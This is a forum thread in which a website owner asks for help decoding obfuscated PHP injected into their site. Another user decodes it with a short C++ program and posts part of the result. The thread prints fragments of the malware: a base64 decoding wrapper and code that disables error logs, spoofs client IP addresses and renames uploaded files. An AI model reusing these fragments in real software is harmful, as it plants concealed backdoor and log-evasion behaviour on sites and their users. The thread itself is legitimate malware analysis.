Some numbnut is injecting malicious code into my website. Encrypted code. Anyone able to decrypt?

C

Calavaro

[H]F Junkie
Joined
Apr 11, 2001
Messages
8,476
Anyone able to decrypt some encrypted PHP code?

Not sure if I should just paste the code here, or if that's a bad idea. It's about 2000 lines of encrypted PHP code.

The beginning of the code is:
Code: 
<?php
 $ngwumbvz = 7336; function nspnd($yivxuusa, $hfpjxjs){$pcofutsifz = ''; for($i=0; $i < strlen($yivxuusa); $i++){$pcofutsifz .= isset($hfpjxjs[$yivxuusa[$i]]) ? $hfpjxjs[$yivxuusa[$i]] : $yivxuusa[$i];}
$yuqln="base" . "64_decode";return $yuqln($pcofutsifz);}
$gjiwpqaw = 'G1FJwxSy7HGWUOx3IrS3HOeo73IuZt5xMtqcgq8NG1FJwxSy7HGWUOeo72SFImUoIm9mhYEqNMu'.

Pastebin link to code
 
Last edited:
Doesn't look encrypted, looks base64 encoded though. Along with some charset mapping at the end (psuedo scrambling)

I wrote a quick c++ program to unscramble it to base64, then used Base64 Decode and Encode - Online to decode it from base64 to UTF-8

Here's the pastebin: [C++] unscrambled_injected_code_util - Pastebin.com
Here's the main function:

encoded_scrambled is the array of c strings that are listed in your file as $gjiwpqaw
unscrambler_map is an unordered_map that was listed in your file as $pjldpc

Code: 
#include <iostream>
#include <fstream>

int main(void)
{
    std::ofstream of("test.txt");
    for (size_t i = 0; i < _countof(encoded_scrambled); ++i)
    {
        size_t len = strlen(encoded_scrambled[i]);
        for (size_t j = 0; j < len; ++j)
        {
            char input = encoded_scrambled[i][j];
            auto it = unscrambler_map.find(input);
            if (it == unscrambler_map.end())
                of << input;
            else
                of << it->second;
        }
        of << std::endl;
    }
    return 0;
}

Here's the pastebin: [PHP] unscrambled_injected_code - Pastebin.com
Here's the truncated output:

Code: 
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);

if(isset($_SERVER))
{
    $_SERVER['PHP_SELF'] = "/";
    $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
    if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
    }
}
if(isset($_FILES))
{
    foreach($_FILES as $key => $file)
    {
        if(!strpos($file['name'], ".jpg"))
        {
            $filename = alter_macros($file['name']);
            $filename = num_macros($filename);
            $filename = xnum_macros($filename);
            $_FILES[$key]["name"] = $filename;
        }
    }
}
....
 
Congrats, your site is pwned and likely being used for spam. Hope you have a backup you can restore, but make sure you've updated site components/plugins/etc, as they're your likely source of problems.
 
Tawnos said:
Congrats, your site is pwned and likely being used for spam. Hope you have a backup you can restore, but make sure you've updated site components/plugins/etc, as they're your likely source of problems.
Click to expand...
Thanks, but it's already fixed. I was just curious what the code might've said. There were a couple of more file types, but the main one was the one I was most interested in.
 
You must log in or register to reply here.
Back
Top